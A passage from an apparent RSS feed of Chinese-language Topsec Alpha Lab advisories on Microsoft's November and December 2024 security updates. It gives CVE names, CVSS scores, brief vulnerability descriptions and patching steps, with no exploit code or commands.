0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-49114：Windows Cloud Files微过滤器驱动本地权限提升漏洞</span></span><br/></span></p></li></ul><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-indent: 0em;">此漏洞是Windows Cloud Files微过滤器驱动中的缺少同步漏洞（CWE-820）。经过普通用户身份认证的本地攻击者通过运行特制的程序来利用此漏洞。成功利用此漏洞的攻击者可以获得目标系统的SYSTEM权限。</span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><ul class="list-paddingleft-1" style="width: 577.422px;letter-spacing: 0.578px;white-space: normal;list-style-type: square;"><li style="font-weight: bold;"><section style="margin-bottom: 8px;line-height: 1.6em;text-align: left;text-indent: 0em;"><strong><span style="letter-spacing: 0.476px;text-decoration-style: solid;text-decoration-color: rgba(0, 0, 0, 0.9);font-size: 16px;">高评分漏洞</span></strong></section></li></ul><table><tbody><tr><td width="123" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVE</span><br/></td><td width="314" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">漏洞名称</span><br/></td><td width="70" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVSS3.1</span><br/></td></tr><tr><td width="143" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-49112</span></td><td width="334" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">Windows轻型目录访问协议(LDAP)远程代码执行漏洞</span></td><td width="88" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">9.8/8.5</span></td></tr><tr><td width="143" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-49085</span></td><td width="334" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">Windows路由和远程访问服务(RRAS)远程代码执行漏洞</span></td><td width="88" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">8.8/7.7</span></td></tr><tr><td width="143" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-49106</span></td><td width="334" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">Windows远程桌面服务远程代码执行漏洞</span></td><td width="88" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">8.1/7.1</span></td></tr></tbody></table><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><p style="margin-top: 0px;margin-bottom: 8px;text-align: left;"><span style="text-align: justify;font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-49112：Windows轻型目录访问协议(LDAP)远程代码执行漏洞</span></span><br/></span></p></li></ul><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-indent: 0em;">此漏洞是Windows轻型目录访问协议(LDAP)中的整数溢出或回绕漏洞（CWE-190）。未经身份认证的远程攻击者通过一组特制的LDAP调用来获取代码执行权限，从而在LDAP服务的上下文中执行任意代码。本月更新中还有多个此组件的漏洞，欲知详情请查看微软的安全公告。</span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="letter-spacing: 0.578px;text-decoration: none;font-size: 14px;"></span></section><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><p style="margin-top: 0px;margin-bottom: 8px;text-align: left;"><span style="text-align: justify;font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-49085：Windows路由和远程访问服务(RRAS)远程代码执行漏洞</span></span></span></p></li></ul><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-indent: 0em;">此漏洞是Windows路由和远程访问服务(RRAS)中的整数溢出或回绕漏洞（CWE-190）和堆溢出漏洞（CWE-122）。未经身份认证的远程攻击者通过诱骗用户向恶意服务器发送请求来利用此漏洞。这可能导致服务器返回恶意数据，从而导致在用户系统上执行任意代码。本月更新中还有多个此组件的漏洞，欲知详情请查看微软的安全公告。</span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="text-indent: 0em;font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-49106：Windows远程桌面服务远程代码执行漏洞</span></span><br/></span></section></li></ul><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-indent: 0em;">此漏洞是Windows远程桌面服务中的敏感数据存储在未正确锁定的内存中漏洞（CWE-591）和释放后重用漏洞（CWE-416）。未经身份认证的远程攻击者通过向具有远程桌面网关角色的系统发送特制HTTPS请求来利用此漏洞，这会触发远程桌面服务中的条件竞争漏洞，并导致释放后重用漏洞，然后利用此漏洞执行任意代码，从而成功利用此漏洞。本月更新中还有多个此组件的漏洞，欲知详情请查看微软的安全公告。</span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="letter-spacing: 0.578px;text-decoration: none;font-size: 14px;"></span></section><section style="margin-bottom: 0px;text-indent: 0em;white-space: normal;line-height: 25.5px;margin-top: 24px;"><strong style="color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.54px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="max-width: 100%;font-size: 24px;line-height: 36px;box-sizing: border-box !important;overflow-wrap: break-word !important;">0x02 影响版本</span></strong></section><hr style="white-space: normal;color: rgb(62, 62, 62);letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;max-width: 100%;background-color: rgb(255, 255, 255);box-sizing: border-box !important;"/><section style="text-indent: 0em;white-space: normal;line-height: 25.5px;text-align: left;margin-top: 16px;margin-bottom: 8px;"><span style="font-size: 14px;letter-spacing: 0.578px;text-indent: 0em;">影响多个主流版本的Windows，多个主流版本的Microsoft系列软件。</span></section><section style="margin-bottom: 0px;margin-top: 24px;"><strong style="color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.54px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="max-width: 100%;font-size: 24px;line-height: 36px;box-sizing: border-box !important;overflow-wrap: break-word !important;">0x03 修复建议</span></strong><br/></section><h2 style="white-space: normal;color: rgb(62, 62, 62);line-height: 24px;letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;max-width: 100%;break-after: auto;background-color: rgb(255, 255, 255);box-sizing: border-box !important;"><strong style="max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"></strong></h2><hr style="white-space: normal;color: rgb(62, 62, 62);letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;max-width: 100%;background-color: rgb(255, 255, 255);box-sizing: border-box !important;"/><ul class="list-paddingleft-1" style="list-style-type: square;"><li style="font-weight: bold;"><p style="white-space: normal;margin-top: 16px;margin-bottom: 16px;"><strong><span style="font-size: 16px;">Windows自动更新</span></strong></p></li></ul><section style="letter-spacing: 0.578px;text-indent: 0em;white-space: normal;margin-top: 0px;margin-bottom: 8px;"><span style="font-size: 14px;">Windows系统默认启用Microsoft Update，当检测到可用更新时，将会自动下载更新并在下一次启动时安装。还可通过以下步骤快速安装更新：</span></section><p style="letter-spacing: 0.578px;text-indent: 0em;white-space: normal;margin-top: 0px;margin-bottom: 0px;"><span style="font-size: 14px;">1、点击“开始菜单”或按Windows快捷键，点击进入“设置”。</span></p><p style="letter-spacing: 0.578px;text-indent: 0em;white-space: normal;margin-top: 0px;margin-bottom: 0px;"><span style="font-size: 14px;">2、选择“更新和安全”，进入“Windows更新”（Windows Server 2012以及Windows Server 2012 R2可通过控制面板进入“Windows更新”，步骤为“控制面板”-&gt;“系统和安全”-&gt;“Windows更新”）。</span></p><p style="letter-spacing: 0.578px;text-indent: 0em;white-space: normal;margin-top: 0px;margin-bottom: 0px;"><span style="font-size: 14px;">3、选择“检查更新”，等待系统将自动检查并下载可用更新。</span></p><p style="letter-spacing: 0.578px;text-indent: 0em;white-space: normal;margin-top: 0px;margin-bottom: 0px;"><span style="font-size: 14px;">4、重启计算机，安装更新系统重新启动后，可通过进入“Windows更新”-&gt;“查看更新历史记录”查看是否成功安装了更新。对于没有成功安装的更新，可以点击该更新名称进入微软官方更新描述链接，点击最新的SSU名称并在新链接中点击“Microsoft 更新目录”，然后在新链接中选择适用于目标系统的补丁进行下载并安装。</span></p><ul class="list-paddingleft-1" style="list-style-type: square;"><li><p style="margin-top: 16px;margin-bottom: 16px;letter-spacing: 0.578px;white-space: normal;"><strong><span style="font-size: 16px;">手动安装补丁</span></strong><span style="font-size: 14px;"><br/></span></p></li></ul><section style="letter-spacing: 0.578px;white-space: normal;margin-top: 0px;margin-bottom: 8px;"><span style="font-size: 14px;">另外，对于不能自动更新的系统版本，可参考以下链接下载适用于该系统的12月补丁并安装：</span></section><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 24px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none;"><a href="https://msrc.microsoft.com/update-guide/releaseNote/2024-Dec" target="_blank">https://msrc.microsoft.com/update-guide/releaseNote/2024-Dec</a></span></section><h2 style="white-space: normal;color: rgb(62, 62, 62);line-height: 24px;letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;max-width: 100%;break-after: auto;background-color: rgb(255, 255, 255);margin-top: 24px;box-sizing: border-box !important;"><strong style="max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="max-width: 100%;font-size: 24px;line-height: 36px;box-sizing: border-box !important;overflow-wrap: break-word !important;">0x04 声明</span></strong><strong style="max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"></strong></h2><hr style="white-space: normal;color: rgb(62, 62, 62);letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;max-width: 100%;background-color: rgb(255, 255, 255);box-sizing: border-box !important;"/><p style="white-space: normal;text-align: left;line-height: 25.5px;text-indent: 32px;margin-bottom: 0px;"><br/></p><p style="color: rgb(53, 53, 53);font-family: &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei&#34;, 黑体, Arial, sans-serif;font-size: 14px;text-align: left;white-space: normal;background-color: rgb(255, 255, 255);margin-bottom: 0px;">天融信阿尔法实验室拥有对此公告的修改和解释权，如欲转载，必须保证此公告的完整性。由于传播、利用此公告而造成的任何后果，均由使用者本人负责，天融信阿尔法实验室不为此承担任何责任。<br/></p><section style="white-space: normal;margin-bottom: 0px;"><section style="margin: 30px 0% 10px;"><section style="display: inline-block;width: 100%;vertical-align: top;border-style: dashed;border-width: 2px;border-radius: 11px;border-color: rgb(141, 186, 190);padding: 10px;background-color: rgba(244, 242, 240, 0.6);"><section><section style="color: rgb(115, 120, 121);"><p><span style="font-size: 14px;">天融信阿尔法实验室成立于2011年，一直以来，阿尔法实验室秉承“攻防一体”的理念，汇聚众多专业技术研究人员，从事攻防技术研究，在安全领域前瞻性技术研究方向上不断前行。作为天融信的安全产品和服务支撑团队，阿尔法实验室精湛的专业技术水平、丰富的排异经验，为天融信产品的研发和升级、承担国家重大安全项目和客户服务提供强有力的技术支撑。</span><br/></p></section></section></section></section></section><section style="margin-bottom: 0px;"><section powered-by="xiumi.us"><section style="text-align: center;margin: 30px 0% 10px;"><section style="display: inline-block;width: 95%;vertical-align: top;box-shadow: rgb(185, 185, 185) 1.41421px 1.41421px 6px;padding: 5px;"><section powered-by="xiumi.us"><section style="margin: -20px 0% 5px;"><p style="vertical-align: middle;display: inline-block;box-shadow: rgb(0, 0, 0) 0px 0px 0px;"><br/></p></section><section style="margin: -20px 0% 5px;"><p style="vertical-align: middle;display: inline-block;box-shadow: rgb(0, 0, 0) 0px 0px 0px;"><br/></p></section><section style="margin: -20px 0% 5px;"><p style="vertical-align: middle;display: inline-block;box-shadow: rgb(0, 0, 0) 0px 0px 0px;"><img class="rich_pages wxw-img" data-ratio="0.06041666666666667" style="vertical-align: middle;width:auto !important;max-width:100% !important;height:auto !important;" data-type="png" data-w="480" src="https://wechat2rss.xlab.app/img-proxy/?k=5ba09fbc&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FH6W1QCHf9dGfIEDOlNXXDTqOpRkEkicJakNxM37lzr8eRJRibEfxkwBibg9KpVh6nibXHoG4xC6KyGFtTd4TOe6GyA%2F640%3Fwx_fmt%3Dpng"/></p></section></section><section powered-by="xiumi.us"><section style="margin: 10px 0%;"><section style="display: inline-block;vertical-align: middle;width: 38%;box-shadow: rgb(0, 0, 0) 0px 0px 0px;padding-left: 10px;"><section powered-by="xiumi.us"><section style="margin-top: 10px;margin-bottom: 10px;"><section style="vertical-align: middle;display: inline-block;"><img class="rich_pages wxw-img" data-ratio="1" style="vertical-align: middle;width:auto !important;max-width:100% !important;height:auto !important;" data-type="jpeg" data-w="344" src="https://wechat2rss.xlab.app/img-proxy/?k=33f7228b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FH6W1QCHf9dGfIEDOlNXXDTqOpRkEkicJawf8nKyKatopPJiaayibAUCvfTVFKfxVDInq2TiaUib6xhmhpLK4Zqscgyg%2F640%3Fwx_fmt%3Djpeg"/></section></section></section></section><section style="display: inline-block;vertical-align: middle;width: 61.8%;"><section powered-by="xiumi.us"><section><section style="font-size: 14px;"><p><span style="font-family:Optima-Regular, PingFangTC-light;">天融信</span></p><p><span style="font-family:Optima-Regular, PingFangTC-light;">阿尔法实验室</span></p></section></section></section><section powered-by="xiumi.us"><section style="margin: 10px 0%;"><section style="display: inline-block;box-shadow: rgb(183, 28, 28) 0px 0px 0px inset;border-style: solid;border-width: 1px;border-radius: 5px;border-color: rgb(66, 66, 66);padding: 5px;background-color: rgb(252, 228, 236);"><section powered-by="xiumi.us"><section style="text-align: left;color: rgb(131, 129, 129);padding-right: 8px;padding-left: 8px;font-size: 14px;"><p><span style="font-family: Optima-Regular, PingFangTC-light;">长按二维码关注我们</span></p></section></section></section></section></section></section></section></section></section></section></section></section><p style="color: rgb(53, 53, 53);font-family: &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei&#34;, 黑体, Arial, sans-serif;font-size: 14px;text-align: left;white-space: normal;background-color: rgb(255, 255, 255);margin-bottom: 0px;"><br/></p><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="2247496664">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=2dc6bac3&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzg3MDAzMDQxNw%3D%3D%26mid%3D2247496664%26idx%3D1%26sn%3D61b0c3aaa8d69a3fb1056ffb3f3d3ed4%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Wed, 11 Dec 2024 14:09:00 +0800</pubDate>
    </item>
    <item>
      <title>【风险提示】天融信关于微软2024年11月安全更新的风险提示</title>
      <link>https://mp.weixin.qq.com/s?__biz=Mzg3MDAzMDQxNw==&amp;mid=2247496662&amp;idx=1&amp;sn=89c2e0f34e55b91c488ba8ef1c710f04</link>
      <description>2024年11月13日，天融信阿尔法实验室监测到微软官方发布了11月安全更新。此次更新共修复89个漏洞，其中4个严重漏洞、84个重要漏洞、1个中危漏洞。</description>
      <content:encoded><![CDATA[<p>
原创 <span>天融信应急响应</span> <span>2024-11-13 16:02</span> <span style="display: inline-block;">北京</span>
</p>

<p>2024年11月13日，天融信阿尔法实验室监测到微软官方发布了11月安全更新。此次更新共修复89个漏洞，其中4个严重漏洞、84个重要漏洞、1个中危漏洞。</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=b9f6448d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FH6W1QCHf9dFAuWicxwmIw9QNBSyN6GrABcSkgTrIxBsgHiaHKWYIddeKgQ7v38EL68obnaSRJjpxDrSOAf34MkIA%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.29259259259259257" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=a7b7e105&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FH6W1QCHf9dFAuWicxwmIw9QNBSyN6GrABpjDae9Wfv6vs4Tg5bETzto4ibjJCEjTWJm0R7fx5lNS9nlpbHtD3Ziag%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin-bottom: 0px;white-space: normal;"><strong style="color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.544px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="max-width: 100%;font-size: 24px;line-height: 36px;box-sizing: border-box !important;overflow-wrap: break-word !important;">0x00 背景介绍</span></strong><br/></p><hr style="white-space: normal;color: rgb(62, 62, 62);letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;max-width: 100%;background-color: rgb(255, 255, 255);box-sizing: border-box !important;"/><p style="white-space: normal;margin-top: 16px;margin-bottom: 8px;"><span style="color: rgb(0, 0, 0);font-size: 14px;letter-spacing: 0.476px;text-indent: 0em;">2024年11月13日，天融信阿尔法实验室监测到微软官方发布了11月安全更新。此次更新共修复89个漏洞，其中4个严重漏洞(Critical)、84个重要漏洞(Important)、1个中危漏洞(Moderate)。</span></p><p style="white-space: normal;margin-top: 16px;margin-bottom: 8px;text-align: justify;"><span style="font-size: 14px;letter-spacing: 0.578px;text-indent: 0em;">本次微软安全更新涉及组件包括：</span><span style="font-size: 14px;letter-spacing: 0.578px;text-indent: 0em;"></span><span style="font-size: 14px;letter-spacing: 0.578px;text-indent: 0em;">Windows Package Library
Manager、Microsoft Virtual Hard Drive、Windows SMBv3 Client/Server、Microsoft
Windows DNS、Windows NTLM、Windows
Telephony Service、Windows VMSwitch、Windows Kernel、Windows Secure Kernel Mode、Windows DWM Core Library、Windows SMB、Windows Active Directory Certificate Services、Microsoft Office Excel、Windows Win32 Kernel
Subsystem</span><span style="font-size: 14px;letter-spacing: 0.578px;text-indent: 0em;">等多个</span><span style="font-size: 14px;letter-spacing: 0.578px;text-indent: 0em;">产品和组件。</span><span style="color: rgb(0, 0, 0);font-size: 14px;letter-spacing: 0.476px;text-indent: 0em;"></span></p><section style="white-space: normal;margin-top: 16px;margin-bottom: 8px;"><span style="color: rgb(0, 0, 0);font-size: 14px;letter-spacing: 0.476px;text-indent: 0em;">微软本次修复中，CVE-2024-43451、CVE-2024-49039被在野利用，通告中声明CVE-2024-43623、CVE-2024-43629、CVE-2024-43630、CVE-2024-43636、CVE-2024-49019、CVE-2024-49033、CVE-2024-49040更容易被利用。</span></section><section style="margin-bottom: 0px;letter-spacing: 0.578px;white-space: normal;margin-top: 24px;"><strong style="color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.544px;"><span style="font-size: 24px;line-height: 36px;">0x01 </span></strong><span style="font-size: 24px;"><strong style="color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.544px;"><span style="font-size: 24px;line-height: 36px;"><strong style="white-space: normal;color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.54px;"><span style="font-size: 24px;line-height: 36px;">重点</span></strong><strong style="white-space: normal;color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.54px;"><span style="font-size: 24px;line-height: 36px;">漏洞描述</span></strong></span></strong></span><br/></section><hr style="white-space: normal;color: rgb(62, 62, 62);letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;background-color: rgb(255, 255, 255);"/><section style="margin-top: 16px;margin-bottom: 16px;letter-spacing: 0.578px;white-space: normal;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration-style: solid;text-decoration-color: rgba(0, 0, 0, 0.9);">本次微软更新中重点漏洞的信息如下所示。<br/></span></section><ul class="list-paddingleft-1" style="list-style-type: square;"><li style="font-weight: bold;font-size: 16px;"><p style="margin-bottom: 8px;text-align: left;margin-top: 0px;"><span style="font-size: 16px;"><strong>在野利用和公开披露漏洞</strong></span></p></li></ul><table align="center" data-sort="sortDisabled" width="578"><tbody><tr><td valign="top" style="word-break: break-all;border-color: rgb(221, 221, 221);" width="156"><span style="font-size: 14px;letter-spacing: 0.578px;text-wrap: wrap;">CVE</span></td><td valign="top" style="word-break: break-all;border-color: rgb(221, 221, 221);" width="333"><span style="font-size: 14px;letter-spacing: 0.578px;text-wrap: wrap;">漏洞名称</span></td><td valign="top" style="word-break: break-all;border-color: rgb(221, 221, 221);" width="88"><span style="font-size: 14px;letter-spacing: 0.578px;text-wrap: wrap;">CVSS3.1</span></td></tr><tr style="border-color: rgb(221, 221, 221);"><td valign="top" style="border-color: rgb(221, 221, 221);" width="156"><span style="font-size: 14px;">CVE-2024-43451</span></td><td valign="top" style="border-color: rgb(221, 221, 221);" width="333"><span style="font-size: 14px;">NTLM 哈希泄露欺骗漏洞</span></td><td valign="top" style="word-break: break-all;border-color: rgb(221, 221, 221);" width="88"><span style="font-size: 14px;">6.5/6.0</span></td></tr><tr style="border-color: rgb(221, 221, 221);"><td valign="top" colspan="1" rowspan="1" style="border-color: rgb(221, 221, 221);" width="156"><span style="font-size: 14px;">CVE-2024-49039</span></td><td valign="top" colspan="1" rowspan="1" style="border-left-color: rgb(221, 221, 221);border-top-color: rgb(221, 221, 221);" width="333"><span style="font-size: 14px;">Windows 任务计划程序特权提升漏洞</span></td><td valign="top" colspan="1" rowspan="1" style="border-color: rgb(221, 221, 221);" width="88"><span style="font-size: 14px;">8.8/8.2</span></td></tr><tr style="border-color: rgb(221, 221, 221);"><td valign="top" colspan="1" rowspan="1" style="border-color: rgb(221, 221, 221);"><span style="font-size: 14px;">CVE-2024-49019</span></td><td valign="top" colspan="1" rowspan="1" style="border-color: rgb(221, 221, 221);"><span style="font-size: 14px;">Active Directory 证书服务特权提升漏洞</span></td><td valign="top" colspan="1" rowspan="1" style="border-left-color: rgb(221, 221, 221);border-top-color: rgb(221, 221, 221);"><span style="font-size: 14px;">7.8/6.8</span></td></tr><tr style="border-color: rgb(221, 221, 221);"><td valign="top" colspan="1" rowspan="1" style="border-color: rgb(221, 221, 221);"><span style="font-size: 14px;">CVE-2024-49040</span></td><td valign="top" colspan="1" rowspan="1" style="border-color: rgb(221, 221, 221);"><span style="font-size: 14px;">Microsoft Exchange 服务器欺骗漏洞</span></td><td valign="top" colspan="1" rowspan="1"><span style="font-size: 14px;">7.5/6.7</span></td></tr></tbody></table><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><p style="margin-bottom: 8px;text-align: left;margin-top: 0px;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-43451：</span></span><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);">NTLM 哈希泄露欺骗漏洞</span></p></li></ul><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);">此漏洞已发现在野利用。此漏洞会向攻击者泄露用户的 NTLMv2 哈希，攻击者可以使用它来验证用户身份，用户与恶意文件的最低限度的交互，例如选择（单击）、检查（右键单击）或执行除打开或执行之外的操作，都可能触发此漏洞。</span></section><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><section style="line-height: 1.6em;text-align: justify;margin: 8px 0px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-49039</span><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);">：</span></span><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);">Windows 任务计划程序特权提升漏洞</span></section></li></ul><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);">此漏洞已发现在野利用。经过身份验证的攻击者需要在目标系统上运行经特殊设计的应用程序，利用此漏洞将其权限提升到中等完整性级别，在这种情况下，可以从低权限的AppContainer发起成功的攻击，攻击者可以提升其权限，以比 AppContainer 执行环境更高的完整性级别执行代码或访问资源。</span></section><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-49019</span><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 